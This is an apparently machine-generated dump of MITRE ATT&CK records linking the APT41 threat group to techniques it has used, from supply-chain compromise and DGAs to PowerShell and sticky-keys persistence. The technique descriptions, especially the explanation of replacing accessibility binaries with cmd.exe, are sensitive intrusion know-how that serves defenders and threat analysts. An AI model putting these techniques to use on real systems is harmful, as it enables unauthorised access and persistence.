x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--10d118e8-c421-486f-a56a-bbe1ed621c62
revoked : False
technique : Compromise Software Supply Chain
technique_description : Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)  
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1195.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used DGAs to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--8488f2ee-be97-458c-894b-830add635fa8
revoked : False
technique : Domain Generation Algorithms
technique_description : Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)

Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1568.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Flow']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a tool called CLASSFON to covertly proxy network communications.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--cb0931f7-4d6c-4f21-95a8-fd9d74ba30e0
revoked : False
technique : Proxy
technique_description : Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1090
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)

relationship_id : relationship--556f8dd8-50e0-4115-9815-c20bfc2b915a
revoked : False
technique : External Remote Services
technique_description : Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)

Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1133
matrix : mitre-attack
platform : ['Windows', 'Linux', 'Containers', 'macOS']
data_sources : ['Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Flow', 'Logon Session: Logon Session Metadata', 'Application Log: Application Log Content', 'Network Traffic: Network Traffic Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--6160a359-35cc-4bbe-ac29-500f2751ed4b
revoked : False
technique : Spearphishing Attachment
technique_description : Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1566.001
matrix : mitre-attack
platform : ['macOS', 'Windows', 'Linux']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow', 'Application Log: Application Log Content', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to masquerade their files as popular anti-virus software.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--285baef5-e948-4e56-a078-5e7f5e7404fd
revoked : False
technique : Match Legitimate Name or Location
technique_description : Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.

Adversaries may also use the same icon of the file they are trying to mimic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1036.005
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Containers']
data_sources : ['File: File Metadata', 'Image: Image Metadata', 'Process: Process Metadata', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims’ environments.(Citation: FireEye APT41 Aug 2019)(Citation: FireEye APT41 March 2020)
relationship_id : relationship--1aaecef9-d21a-420c-a6c0-53cca7a5e5d8
revoked : False
technique : PowerShell
technique_description : Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Script: Script Execution', 'Process: Process Creation', 'Process: Process Metadata', 'Command: Command Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) leveraged sticky keys to establish persistence.(Citation: FireEye APT41 Aug 2019) 
relationship_id : relationship--728c2a84-ac7d-4b17-a287-4c692d717065
revoked : False
technique : Accessibility Features
technique_description : Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)

* On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>
* Magnifier: <code>C:\Windows\System32\Magnify.exe</code>
* Narrator: <code>C:\Windows\System32\Narrator.exe</code>
* Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>
